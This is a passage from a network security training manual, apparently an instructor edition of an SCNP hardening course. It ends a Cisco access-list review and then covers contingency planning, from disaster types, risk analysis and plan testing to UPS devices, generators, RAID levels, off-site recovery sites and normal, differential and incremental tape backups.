Router(config)#access-list access-list-number{permit|deny}protocol source source-mask destinationdestination-mask[operator|operand]

What is the syntax for implementation of a standard Access ControlList?

Router(config-if)#ip access-group access-list-number{in|out}

5F When a configuration change is made to the router, such as an interfacebeing brought down, what level of message will this generate?

Level 5.

What is the command for an access list to be implemented on the VTYsessions?

access-class [access list number] in

378 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 432: SCNP Hardening

Contingency Planning

OverviewIn this lesson, you will take a look at various types of disasters that canbefall an organization and put it out of business—unless the organizationhas implemented some form of business continuity planning. You will lookat how such plans can be developed and tested. You will review some tech-nologies that can help keep you powered on, backup strategies for operatingsystems, and products that can be used in various situations.

ObjectivesIn this lesson, you will:

6A Identify disaster types, examine issues related to contingency plan-ning, and consider the role of security policies as part of an overallcontingency planning strategy.

In this topic, you will see why you have to plan for backups, look at thevarious types of disasters that can occur, and briefly look at security poli-cies and their affect on business.

6B Analyze contingency planning goals, and review the testing of suchplans.

In this topic, you will analyze the goals of a contingency plan, and lookat the various aspects of testing a contingency plan.

6C Study the effect of electrical power loss for networks and the backupplanning required to prevent such events.

In this topic, you will analyze the effects of losing electrical power onyour network, and look at various devices that you can use to defendagainst such disturbances, such as UPS devices and generators.

6D Examine data-backup strategies for various operating systems andperform tasks related to backups.

In this topic, you will look at backup strategies for operating systems,such as RAID, and other archival options, such as tapes or other harddrives. You will perform hands-on operations detailing the differencesbetween normal, differential, and incremental backups. You will also per-form a backup of a Cisco router’s configuration.

Data Filesnone

Lesson Time4 hours

LESSON

6

Lesson 6: Contingency Planning 379

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 433: SCNP Hardening

Topic 6AContinuity and RecoveryContingency planning forms a significant part of modern business. If a business isto survive a disaster and move forward, it has no choice but to plan for and allo-cate sufficient resources to cater to the recovery process. When continuity andrecovery planning are discussed in boardrooms, computers and networks are justone of the many issues talked about—although most businesses have, in the lastdecade, begun to rely heavily on technology to get the job done. Computers andnetworks are therefore justifiably critical components in any modern business.

For this lesson, we will look at continuity and recovery for the following areas:

• Computers

• Networks

• The premises that house them

Planning for BackupsBefore a continuity and recovery system is put into place for an organization, astudy needs to be undertaken in order to classify the nature of the business andits requirement for putting a recovery system in place.

This study can be undertaken by one person or by a team of people representinga cross-section of the people employed by the organization, depending on the sizeof that organization. As with anything that has a financial connotation, the organi-zation’s upper management has to be involved and made aware of theimplications of implementing the various technologies involved, but upper man-agement does not necessarily need to have all of the little details.

Depending on the problems that need solving, solutions can vary. Beginning withcreating an Appropriate Resource Usage document or Acceptable Use Policy forthe users, to controlling user behavior within the bounds of acceptance, to defin-ing what resources need protection and what resources need to be backed up, todefining what resources need to have a redundant but live copy—the individualsor the team members leading the study have their work cut out for them.

DisastersDisasters that can affect businesses can be classified into various categoriesdepending on who you talk to, however, we can start by classifying them broadlyinto natural and man-made categories. Here are some examples of each:

• Natural disasters include:

— Floods.

— Earthquakes.

— Tornadoes.

— Getting hit by a meteorite.

• Man-made disasters include:

Acceptable Use Policies willbe dealt with in greater detail

in the Network Defense andCountermeasures course.

Examples of Disasters

380 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 434: SCNP Hardening

— Intentional disasters, such as terrorist attacks, worker lockouts/strikes,and so forth.

— Unintentional disasters, such as design error, operator error, mismanage-ment, and so forth.

You may have noticed that we didn’t mentioned fire in the enumeration ofdisasters. Fires can be a result of either a natural or man-made cause. When firesare man-made, they could be intentional or unintentional.

Not much can be done to prevent natural disasters. You should, however, have arecovery plan. For a recovery plan to be effective, it should be housed in structur-ally and environmentally sound buildings or it should be housed far away,perhaps in another geographic location, if your business is to survive suchcalamities.

As an example, and on a more serious note, just a few days after the 9-11 terror-ist attacks, American Express sent an email to all its valued customers, reassuringeveryone that even though their offices in Manhattan were affected, their businesswas not, due to the excellent backup and recovery systems maintained elsewhere.

Environmental DisastersAnalyzing which natural disasters to take into account, and which not to, is fairlystraightforward. First, list all known natural disasters, then highlight those that arelikely in your location. Those that are not highlighted are extremely unlikely orimprobable for that location.

Certain natural disasters are known to be fairly regular in certain locations. Forexample, in some low-lying areas of Florida, the threat of flooding is fairly highduring the hurricane season. Tornadoes are common in Kansas, forest fires breakout now and then in the southwest regions of the U.S., and the threat of an earth-quake always looms over one well-known city in California.

Lesson 6: Contingency Planning 381

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 435: SCNP Hardening

Technological or Man-made DisastersIn analyzing which man-made disasters to take into account, and which not to, allbets are off. Let’s revisit the list we created earlier. Broadly speaking, man-madedisasters are divided into intentional and unintentional subcategories.

• Terrorist attacks are intentional. They can be vicious, physical attacks, orthey can be more subtle, such as cyber-terrorism.

• Worker lockouts or worker strikes are generally known to the managementbeforehand, so some planning can be done.

• Computer viruses, worms, and Trojan horses all fall under the man-made andintentional categories. Programmers who write and spread such code do sowith the knowledge that their creations are going to cause harm. These aredisasters waiting to happen. Sometimes these programs are released underthe guise of remote management tools, but they can be used maliciously,nevertheless. Attacks fashioned against email and Web servers aim to para-lyze a company by targeting its digital nervous system. Today, firewalls,intrusion detection systems, and response systems are part of a huge indus-try, thanks to the previously-mentioned breed of programmers.

• Unintentional man-made disasters are very difficult to gauge or predict. If adisaster is due to a design error, you generally have to go back to the draw-ing board. If it’s due to operator error or mismanagement, you have toreform your usage policies.

• Sometimes, just the day-to-day wear and tear on computer systems willbring them down. The classic component in computer systems that suffersuch wear and tear are the hard drives, simply because they are comprised ofmoving parts—spinning disks and read/write heads that swing back and forthalong the disk surfaces. Modern hard drives are surprisingly durable, butthey still have a useful life of around five years. Since data and programsreside mainly on hard drives, you have to plan on backing them upperiodically.

• Electrical power fluctuations—spikes, surges, sags, brownouts, faults, andblackouts—can also cause havoc; therefore, one of the preventive measuresthat must be addressed should deal with conditioning and steadying thepower supply before it is fed into your computer and network systems.

• Loss of electrical power, even momentarily, can be disastrous, so all sensi-tive systems should be able to instantaneously switch over to a backuppower system. A better method would be to run the systems off of thebackup system while continually recharging it. This should not surpriseanyone—take a look at how your notebook works. In fact, some companiesthat have realized this are beginning to furnish every user’s desk with adocking station and a notebook instead of a desktop PC, simply because amomentary power outage would not disrupt anybody’s work.

Security Policies and Their Impact on the BusinessIn Network Defense and Countermeasures, the next course in this series, you willdo a lot more work on analyzing risk and formulating security policies for yourorganization, so we will just touch on it lightly here.

virus:A program that can “infect”

other programs by modifyingthem to include a possibly

evolved copy of itself.

worm:Independent program that

replicates from machine tomachine across network

connections often cloggingnetworks and information

systems as it spreads.

382 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 436: SCNP Hardening

Before writing a security policy, all risks that can be foreseen have to beanalyzed. Broadly speaking, there are two kinds of analyses that can be per-formed: qualitative and quantitative.

Quantitative Risk AnalysisIt’s the quantitative risk analysis that will interest the upper management of acompany (those who allocate budgets, for instance), because with this method, adollar value can be assigned to the potential risk at hand. A quantitative analysishas two basic parts: the probability of a threat occurring and the estimated lossthat will result from the threat.

Insurance companies use quantitative analysis frequently. Think for a few minuteson the initial conversation you had with your motor vehicle insurance provider.What kinds of questions were you asked? Typically, you would have been askedto answer the following kinds of questions:

• What is the make and model of the car?

• What is your age, as well as the age of anyone else who would be drivingthe car?

• How many miles a day would you typically drive to work?

• Do you park your car in an enclosed space or on a street side?

• Does your car have airbags?

• Do you wear seat belts? It may be the law, but they will still ask you.

• Have you been ticketed for speeding before?

• Have you, as a driver, been involved in any accidents before?

• What kind of coverage do you expect to have?

Basically, the insurance company profiles you according to the answers that youprovide to these questions. Between the profile they create of you and the kind ofcoverage you expect to have, they will give you a quote for your monthly, quar-terly, half-yearly, or annual premium. They have thus performed a quantitativerisk analysis on you and your car.

To create a quantitative risk analysis for your computers and networks, youwould do something similar. For example, you might use the following sequence:

1. Create an inventory of all assets within your network.

2. Identify all of your users, including information about the type of users, theirday-to-day demands on the network, and so forth.

3. Analyze what kind of security systems you have, such as authenticationmechanisms and access control.

4. Determine what kind of backup systems are already in place.

5. Identify what risks are covered and what are not.

6. Determine if the uncovered risks are acceptable to your company.

Based on analyses like these, you would be able to recognize the need for backupsystems, what your company would do in the event that disaster struck, and howthe recovery methodologies would be put to work.

threat:The means through whichthe ability or intent of athreat agent to adverselyaffect an automated system,facility, or operation can bemanifest. A potentialviolation of security.

Quantitative Risk Analysis

Lesson 6: Contingency Planning 383

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 437: SCNP Hardening

Backup and Recovery PoliciesThe backup and recovery section of a security policy provides the foundation forthe continuity of the entire organization. A generic definition of the policy is thatit provides a document, or a set of documents, that describe the backup securitycontrols that are to be implemented in an organization. From a benefit standpoint,the policy is able to provide the organization with several key points. These ben-efits can be generalized into the following:

• They lower the legal liability to employees and third-party users ofresources.

• They prevent waste of resources.

• They protect proprietary and confidential information from theft, unautho-rized access or modification, or internal misuse of resources.

Topic 6BDeveloping the PlanTo develop an effective contingency plan, you need to have some ideas aboutwhat the plan should cover, as well as how to test it so that you know that it willwork when you need it to. Let’s begin by looking at what you want the plan toaccomplish.

Requirements and Goals of a Contingency PlanOnce a risk analysis has been done for a company, and it has been agreed to bythe planning team, it will be up to the executive group to implement a contin-gency plan. All items that require some form of backup plan have to be listed.For example, take a look at the following table.

Number Item Standard Backup1 Electrical power Utility company UPS2 Computer data Hard drives Tape drives3 Backed-up data Tape drives DVD-R4 Internet access T1 from ISP A SDSL from ISP B5 Internet access backup SDSL from ISP B Via satellite from ISP C

In this table, you can see that there are secondary backup plans for the backupplans themselves. This depends on the criticality of the item in question. IfInternet access is a critical issue, then the company has to choose its ISP(s)wisely. Not only should the company hedge its bets with multiple ISPs, it alsoshould make sure that it has a different physical line running out of its building tothe ISP. If an ISP is offering DSL services by leasing bandwidth from your localphone company and the local phone company has a fault, then your companymay not have Internet access at all for a couple of days until the fault on thephone line is rectified. A wireless solution via satellite, for example, will take acompletely different path out of your building and may allow you to hedge yourbets.

384 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 438: SCNP Hardening

Listing the goals of contingency planning is a critical step, as this will have adirect bearing on how the plan should be implemented and in what sequence. Theprevious table looks like somebody read the minutes of the first brainstormingmeeting and attempted to order the list into a chart. It is clearly a first attempt.After a few more meetings, more issues will be brought forth and may includeother items that are imperative for the business if it has to survive a disaster.

Not only should the contingency plan list and analyze all possible threats to thebusiness, the backup plans to counter these threats should also be graded in orderof importance to the continuity of the business. Responsibility has to be assignedto a person, and a brief description of the job required to carry out that plan hasto be noted. The person selected (or the position in the company) has to be pro-vided appropriate authority to carry out the task. Emergency roles have to bedefined. The priority of tasks to be carried out has to be listed as per the gradesallocated. Finally, a simulation of the crisis has to be carried out.

Creating the Contingency PlanThe team of people designated to handle a crisis can be a different team from theone handling that job on a daily basis. Some diversity is desired, because in anemergency, the people who handle the job on a daily basis may not be around. Ifimmediate action is paramount; for example, if backup tapes have to be used torestore the systems right away, then more than one network administrator must betrained in this process. This is an extremely critical process—restoring the wrongbackup data could set the company back by that many days, weeks, or maybeeven months.

Testing the PlanAny backup and restore plan that you come up with must be tested, both intheory and in practice. The theoretical outline must be vetted through by morethan one person involved in the system and their comments debated. Once every-one involved in the process is in agreement, the plan has to be clearly stated. Allconcerned personnel involved in the recovery effort should be given a copy ofthis plan for study.

Testing of plans can be done at various levels and intensities. They are broadlydivided as follows:

• Simulated testing on paper (or check list test).

• Limited environment simulation (or structured walk-through test).

• Full-scale environment simulation (or full interruption test).

Simulated Testing on Paper (the Check List Test)When all of the personnel involved in the recovery effort have been given suffi-cient time to study their roles in the recovery process, they should walk throughthe steps in a sort of dry run of the procedures involved. This is also known as acheck list test or a simulated paper test. Different disaster scenarios are recordedon a whiteboard, and the various personnel start filling in the blanks to the recov-ery plan based on the role(s) allocated to them. This is akin to reading through ascript before staging a rehearsal for a play.

Contingency Plan Testing

Lesson 6: Contingency Planning 385

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 439: SCNP Hardening

Limited Environment Simulation (the Structured Walk-through Test)An example for limited environment simulation that many of you might be famil-iar with is when the electronic surveillance monitoring and security systems arefirst installed at your premises. After the alarm system has been installed, a selectfew people with certain levels of responsibility in the company are informed ofthe code to enter upon opening the premises. The contact phone numbers forthese people are given to the company that installed the security system. Uponinstallation of the system and initial testing, the system alarm is tripped, and thealarm is automatically sent to the security company. The security company per-sonnel looks up their list of phone numbers for your company and proceeds tocall each one, in turn, down the list. If none of the people on that list answer thephone, then the local police are called in to investigate a potential break-in.

Another example is the fire drill, typically carried out in tall buildings. When fire-escape drills are first explained to the general building populace, every aspect ofthe escape process is walked through. These are also referred to as structuredwalk-through tests.

Similarly, once a backup system is in place, then the recovery system should beput through its paces to make sure it works. When various departments in anorganization that normally interact with each other in a certain way now find thatthere are other interaction channels, situations may arise. Typical problems thatoccur have to do with the hierarchical nature of most large organizations. A per-son at a senior level in one department may feel that he or she does not have toanswer to a person in a peer position in another department. These issues shouldbe catalogued, then the backup and recovery plan should be reviewed to takethem into account.

Full-scale Environment Simulation (the Full InterruptionTest)In an full-scale simulation test, a disaster scenario is chosen and the recoveryplan for that scenario is actually executed, step by step, to see if it works.Restrictions to the availability of resources are mimicked as with an actualdisaster. The simulation may be designed so that any backup or recovery mecha-nisms that are available at a hot, warm, or cold site (you’ll see more about theselater) that needs to be accessed to expedite recovery can be accessed.

Unexpected or unpredictable events can occur during a simulation test. As withthe structured walk-through tests, such events should be recorded, then thebackup and recovery plan should be reviewed to take them into account. Oncethe reason for the unexpected event is understood, then the backup and recoveryplan should be modified to take this into account. In an actual simulation test, theorganization’s day-to-day workings are not disturbed, because only those person-nel involved in the recovery operations are affected.

A full-scale simulation can also be undertaken so that all aspects of a recoveryprocess are tested. This kind of a test is performed infrequently and retests spacedfar apart, as it is disruptive to the organization. The majority of the people in thecompany are not told in advance that it is a test. Such a test, also termed as a fullinterruption test, will actually test the reaction of all the personnel within theorganization. Not everybody reacts well under stress, and this test will help inidentifying those people who can be trusted to undertake critical jobs in anemergency.

This is different than havingan unannounced drill, wherethe occupants are caught bysurprise, and the sanctity of

the drill is maintained bycarrying it out at irregular

intervals.

availability:Assuring information and

communications services willbe ready for use when

expected.

386 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 440: SCNP Hardening

Topic 6CThe Technologies of Staying OnMost of us rely on our local power utility companies as our primary powersource. Depending on the criticality of the business, we may choose to supple-ment this with some form of battery backup or even generate our own power,with appropriate technologies to assist in the switchover.

Spike busters and surge suppressors help protect against only spikes and surges;voltage stabilizers help protect against spikes, surges, and sags. Not only dobackup batteries take care of those scenarios, they also help protect against faultsand brownouts, as well as short-term blackouts. Generator sets help protectagainst prolonged blackouts. Figure 6-1 will help explain these relationshipsbetter.

Figure 6-1: Disturbances in electrical supply and their remedies.

Personal UPS DevicesIf you visit www.tigerdirect.com and look for power protection devices, you willsee the following subcategories: surge suppressors, UPS Battery Backup (Per-sonal), UPS Battery Backup (Business), UPS Battery Backup (Network). This ispretty much how UPS devices are cataloged.

Even if you are not going to buy a UPS system, you should at least have a surgesuppressor. Having said that, most personal-use UPS devices are quite affordableand are a must for small businesses. They are rated from around 150 to 300watts, and provide enough time (about 15 minutes) for you to at least save yourwork, finish small print jobs, and shut down the computer properly.

Disturbances in ElectricalSupply and Their Remedies

Lesson 6: Contingency Planning 387

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 441: SCNP Hardening

Smarter UPS systems will have a separate communication channel with your PCvia the serial port or a USB port. In case you are not around when the powerfails, the UPS will initiate a clean shutdown of the system.

On a Windows machine, you can use the Power Options Control Panel to manageyour UPS devices. This interface was developed by APC for Microsoft. On aLinux machine, you can use APCUPSD (APC’s UPS Daemon), which is avail-able at www.apcupsd.com/index2.html.

TASK 6C-1Configuring a UPS

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Open the Power Options Control Panel.

2. Select the UPS tab.

3. In the Details box, click the Select button.

4. Under Select Manufacturer, select American Power Conversion. There aremany models to choose from.

5. Select Back-UPS Pro. For On Port, verify that COM1 is selected. ClickFinish. Now you should see the Configure button.

6. Click Configure.

It does not matter that youdo not have a UPS, you arejust taking a look at how to

configure one.

388 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 442: SCNP Hardening

7. Examine the options. They include Minutes On Battery Before CriticalAlarm, When The Alarm Occurs Run This Program, and Next, Instruct TheComputer To Shutdown.

8. Click Cancel twice, and close the Control Panel window.

Full Server Rack UPS DevicesHigher-end UPS devices are essentially the same in function as their smallercousins, but with some significant differences that add to their costs, such as:

• Increased battery capacity (high-end models enable you to hot-swapbatteries).

• Battery packs typically have faster recharge times.

• The software used to communicate with the PC is richer in features.

• Some UPS devices are SNMP-compatible (directly addressable on a net-work, or even via the Web), apart from the usual communication channels(serial or USB ports).

• Incoming and outgoing electrical supplies are vigorously monitored.

• Event logging may be included.

• Output is sometimes user-adjustable.

• Displays on the UPS devices can be LCD readouts, rather than just LEDsignals.

• Some UPS devices can be rack-mounted. Such devices, being modular, allowfor easy expansion.

• High-end models may go up to 500 KW to 1 MW, requiring a three-phasecircuit.

• A greater range of environmental variables for operation is available.

• Some UPS models may themselves be fault-tolerant (that is, they will havesome level of redundancy built in).

Building GeneratorsAbout 15 years ago, the Indian government wanted to buy a Cray supercomputerfor weather analysis and prediction. The U.S. government stepped in and blockedthe sale, suspecting that the supercomputer could be clandestinely used for mili-tary purposes. The Indian government then turned to its premier computerengineers and programmers at the Centre for Development of Advanced Comput-ing (CDAC), who then proceeded to design and build a massive paralleldistributed computer (PARAM) by using a bunch of mini computers and hun-dreds or thousands of PC-class computers, all on a network.

One of the pilot projects was housed in a single building with entire floors filledwith workstations. The incoming power supply was stabilized and fed to aswitching station. If this external power supply ever tripped, a backup generatorthat could meet the needs of the whole building would take over. If this backupgenerator ran out of fuel (diesel) or malfunctioned, a second identical backupgenerator would take over. If either of these malfunctioned or if diesel was inshort supply, a third backup generator would kick in. This third backup generatorran on a fuel other than diesel. The power generated was also stabilized and fed

Lesson 6: Contingency Planning 389

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 443: SCNP Hardening

to the switching station. The basement was taken over and dedicated to banks ofbatteries from floor to ceiling. So a steady source of electricity, whether from anexternal source or from the generators, constantly recharged these banks of batter-ies, which then fed squeaky-clean power to the computers in the building. Ineffect, the entire building was a single computer and the basement was the UPS.

Figure 6-2: Multiple backups of power supplies for the CDAC pilot.

Needless to say, the engineers accomplished their task in a few years and deliv-ered the equivalent of a supercomputer.

Do most companies go to these extremes when designing electrical systems fortheir networks? Not likely. But would they do it if it was mission-critical?Absolutely. The above example is just one of thousands of such installationsacross the U.S. and around the world.

Generator TypesElectrical output can be broadly classified into two types: DC (Direct Current)and. AC (Alternating Current). As we all know, the advantage of DC is it can bestored, while AC cannot. AC can, however, be piped over vast distances, albeitwith some losses along the way.

Depending on the country you are in, the voltage required to run most of yourelectrical equipment can be broadly divided into 110 V AC at 60 Hz (mostlyNorth America) or 220 V AC at 50 Hz (the rest of the world), though you willfind exceptions here and there. Cuba, for example, supports both 110 V and 220V. For a more comprehensive list, visit http://kropla.com/electric2.htm.

Portable generators are generally in the 5 KW range and top out at around 8 to10 KW. Typical home systems top out at around 20 KW, while on-site generatorsfor buildings can be installed at various capacities—typically from 50 KW sys-tems to 2 MW systems, depending on your requirements and budgetaryconstraints. As of this writing, it costs approximately $800 to $1200 per installedKW in the U.S., so a 50 KW system may cost around $60,000 to install while a

Multiple Backups of PowerSupplies

Visitwww.flintenergies.com, aGeorgia-based company, andclick the Energy Library link

for a good tutorial onenergy, power generation,

and related issues.

390 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 444: SCNP Hardening

2 MW system may cost around $1.6 million to install. Note that there a numberof variables to consider, so these figures are useful only for initial discussions.You have to work with a manufacturer for more accurate pricing. Most of yourelectrical equipment then converts the received AC power as required for the job.For a first look at such issues, check out this Web site:www.westernmachinery.com. Of course, you can always start at the world’snumber 1 electrical company, GE, at their Web site: www.gepower.com.

Because AC power typically suffers from fluctuations, it is necessary to conditionit before it reaches sensitive electrical equipment, for which we typically usedevices like voltage stabilizers and spike busters.

Fuel TypesDiesel, propane, kerosene, gasoline (or petrol), CNG (compressed natural gas),LNG (liquefied natural gas), methanol, and ethanol are all popular types of fuelused by generators. The decision to use one type of fuel over another is typicallymade from a purely economic standpoint (apart from the fact that all of themrelease pollutants into the atmosphere and the local laws governing storage, use,and pollution control vary). In a few years, this topic will have to be completelyrewritten, with emerging fuel-cell technologies holding a lot of promise.

Generator ImplementationMost small and medium-sized businesses in the U.S. take it for granted that elec-tricity is to be purchased from the utility company serving their locality and thaton-site power generation is only a fault tolerant measure. Larger establishments,however, that are fed up with erratic pricing and supply by utility companies(reinforced all the more by the events that took place early in 2001 in California)can make a conscious decision to install their own generation plant, and com-pletely bypass the utility company altogether. In fact, they can even connect backto the grid and sell any excess power generated to the utility companies. Thedecision to implement a generator system for your building(s) is driven by eco-nomics of scale, but at least the consumer has a growing list of options thatweren’t available just a decade ago.

Topic 6DBacking Up the Operating SystemsThere are many options for backing up the operating system, including:

• A tape backup of the OS. There are many methods to using tapes to backupthe OS. Operating systems might have their own backup software, or youcan go with vendor-specific solutions. More about tape backups will followlater.

• Using fault-tolerant disk configurations allowed by the OS. This is one ofthe first steps to take when implementing some measure of backup. Suchconfigurations are also termed Redundant Array of Independent Disks(RAID) and are assigned numbers to represent various configurations, suchas disk mirroring (RAID 1) or disk striping with parity (such as RAID 5).

• Vendor-specific fault-tolerant configurations. As with tape backups, operatingsystems can have their own RAID software, or you can go with vendor-specific solutions. These are typically hardware solutions, such as a mirrored

Lesson 6: Contingency Planning 391

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 445: SCNP Hardening

RAID 0, also known as RAID 10. Hardware solutions take the load off ofthe CPU and are therefore faster and more suited for heavy-duty servers.Low-end systems may simply use the operating system’s feature set toimplement a supported RAID level. The decision to use one RAID levelover another depends on disk-utilization efficiencies, and therefore, the timeto restore, as well. For example, RAID 1 will allow you to utilize only 50percent of the disk space earmarked. RAID 5 using three drives will allowyou to utilize 66 percent (two out of three). However, in the event of a fail-ure, RAID 1 will be up and running in next to no time, while RAID 5 willtake some time to rebuild the data off the parity information stored on theother drives.

• A complete, fully functioning, machine configured as a backup. This is typi-cally found in fault-tolerant cluster configurations. Two-way and four-wayclusters are popular configurations, but can be implemented only by usingoperating systems at the higher end of the spectrum. Larger clusters can becreated, but this requires highly specialized knowledge and personnel trainedin the assembly of such systems.

• Over and above these ready-made solutions for backup, a usage policy iscritical to the success of the backup operation. Users must be trained to storetheir finished work on the file servers, or policies should be enforced thatwould prevent users from accessing local storage space.

RAID LevelsTo explain the various RAID levels, we will use several figures. As you reviewthese figures, note that the word level is misleading, as it connotes that one levelleads to another. It is better to simply think of these numbers the way we treatsome letters of the Greek alphabet—as mathematical constants. Each figure alsoincludes a percentage of efficiency. This is simply an indicator of how much diskspace assigned to that RAID level can be used for actual data storage. It does notmean that one version is more efficient than the other. This is just a traditionalway of expressing utilization percentage.

Figure 6-3 shows RAID level 1, with disk mirroring.

Figure 6-3: RAID level 1, disk mirroring.

RAID Level 1, DiskMirroring

392 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 446: SCNP Hardening

Figure 6-4 shows RAID level 1, with disk duplexing.

Figure 6-4: RAID level 1, disk duplexing.

Figure 6-5 shows RAID level 5, with disk striping and parity.

Figure 6-5: RAID level 5, striping with parity.

Figure 6-6 show RAID level 0, with a stripe set.

RAID Level 1, DiskDuplexing

RAID Level 5, Striping withParity

RAID Level 0, Stripe Set

Lesson 6: Contingency Planning 393

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 447: SCNP Hardening

Figure 6-6: RAID level 0, stripe set.

Figure 6-7 shows RAID level 10, with a mirrored stripe set.

Figure 6-7: RAID level 10, mirrored stripe set.

Hardware OptionsSo far, all of the backup strategies discussed are on the same site, maybe even onthe same machine. What if the server room caught fire or was flooded, and all ofthe machines became inaccessible?

To counter this threat, you have to have off-site facilities. They are classified intothree types of sites: cold sites, warm sites, and hot sites.

• Cold sites are simply working spaces with associated physical security,power outlets, telecommunications, and Internet connectivity. Recovery timeat a cold site is typically over three days. This is the most affordable option,and depending on the provider, can cost around $2,000 per month for theaverage customer.

• Warm sites, in addition to everything provided for in a cold site, consists ofmission-critical components, and is partially, but not completely, configuredwith equipment. For example, rack mounts may be physically present and

RAID Level 10, MirroredStripe Set

394 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 448: SCNP Hardening

electrically ready, with no servers mounted in them. Such a site is viable ifthe recovery time is allowed to be greater than half a day, but under a day ortwo. This is by far the most popular option. Pricing cannot be standardizedhere, as it can only be worked out after the organization and the providerhave thoroughly discussed what constitutes a warm site.

• Hot sites are practically a working replica of your server and clientconfigurations. This is the most expensive option, and as with warm sites,pricing cannot be standardized here. If disaster strikes, then depending on theremaining manpower available and the training provided to them, the com-pany can be up and running at the hot site in a matter of hours. By the way,the military is trained to do this all the time. Of course, you cannot comparea regular company with the military, but there are occasions when evencivilian establishments require such levels of discipline to keep from goingout of business altogether.

Typically, an organization would not build and maintain its own cold, warm, orhot sites, but would instead purchase these services from another organization,such as Exodus (now Cable & Wireless PLC). If you visit www.cw.com, selectyour country, click the Products & Services link, then the Business Continuity &Recovery Services link; and finally the Facility Infrastructure Services link, youcan read more about the various services offered by Cable & Wireless to set upsuch sites for your organization.

For further education in this aspect of your business, you can also visit the Insti-tute for Business Continuity Training at www.ibct.com.

Backup OptionsTo recover from these kinds of disasters we need a different kind of backup—thekind that, at the end of the day, takes that day’s information off the server andputs it away on some external media, where it will not be changed until it isoverwritten at some future date. Tape drives are by far the most popular backupmedia as they are, byte for byte, one of cheapest forms of data storage. Most ofthese tapes currently retail for around $70 per 100 GB of storage (that’s $0.70 perGB), and the prices continue to fall. At standard 2:1 compression rates, thisbrings the price down to $0.35 per GB. The only issue is speed. Data transferrates are in the region of 20 MB/sec. That means filling such a tape to capacitywill take approximately under 3 hours.

In large data-storage centers that are performing normal backups daily, vastamounts of information would have to be backed up, and the tape drives wouldhave to run almost incessantly. Therefore, alternative tape-backup solutions exist,whereby once a full backup is prepared, subsequent backups do not need to bebacked up byte for byte. Rather, just the data that changed since that full backupwas performed needs be backed up. This is known as a differential backup. If thismethod gets to be too demanding on tape capacity, then subsequent backups cansimply back up data that changed since the last backup. This is known as anincremental backup.

Comparing Normal,Differential, and IncrementalBackups

Lesson 6: Contingency Planning 395

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 449: SCNP Hardening

Figure 6-8: Comparing normal, differential, and incremental backups.

Take a look at Figure 6-8. This explains all three methods of backup. The typicalbackup cycle is run on a weekly basis. Notice that the normal backup begins overthe weekend, when there is sufficient time to do a full, normal backup of thesystem. If this is a small business and all of the information fits on one tape, thena normal backup can be done every day.

In some instances (normal and differential backups), tapes can theoretically bereused without affecting restoration capabilities (the curved arrows connectingWeekend with Tuesday, Monday with Wednesday, and Tuesday with Thursday).Therefore, if you’re performing a normal backup, the weekend tape can be reusedon Tuesday night, because Monday night’s tape holds all of the currentinformation. Monday night’s tape can be reused on Wednesday night, while Tues-day’s tape can come back on Thursday.

This is an oversimplified tape-swapping operation—in reality, one tape shouldalways remain away from the server and the other backup tapes to protect againstdisaster, for instance, a fire in the server room. Large organizations will not swaptapes on alternate days. Rather, they will maintain entire sets of weekly tapes. Ifthey have to swap tapes, it will be from tape sets belonging from a few weeks oreven a few months ago, depending on the quality-control requirements. Eventu-ally tapes are retired (usually after a year or so), and one of the sets representingthat year makes it to a long-term storage facility somewhere for recordkeepingpurposes.

Common terminologies that you will hear regarding tape reuse are theGrandfather-Father-Son (GFS) scheme and the Tower of Hanoi scheme. To learnmore about these schemes, you can read an excellent article on Exabyte’s Website, found at www.exabyte.com/support/online/documentation/whitepapers/basicbackup.pdf.

396 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 450: SCNP Hardening

When you employ the normal backup routine, restoration is extremely easy. Allyou need is the last backup. For example, if you need to restore from backup onThursday, all you need is Wednesday night’s tape set.

The differential backup sequence begins like a normal backup sequence does.Over the weekend, a complete, normal backup is created. On Monday night, onlythose files that were changed on Monday are backed up. Notice that there’s notmuch to back up on Monday. On Tuesday night, only the files that were changedon Monday and Tuesday are backed up. As the week progresses, the amount ofdata that needs to be backed up continues to grow. However, tapes can still berecycled within the week, as shown.

With a differential backup scheme, if you need to restore from backup on Thurs-day, you need the weekend tape set and Wednesday night’s tapes.

The incremental backup sequence begins like a differential backup sequence.Over the weekend, a complete, normal backup is created. On Monday night, onlythe files that were changed on Monday are backed up. Notice again that there’snot much to back up on Monday. On Tuesday night, only the files that werechanged on Tuesday are backed up, and so on. With this method of backup, tapescannot be recycled during the week, as shown.

With an incremental backup scheme, if you need to restore from backup onThursday, you need the weekend tape set and Monday, Tuesday, and Wednesdaynight’s tapes, so you have to be careful how you label and store these tapes, asthe tapes cannot be out of sequence at any time.

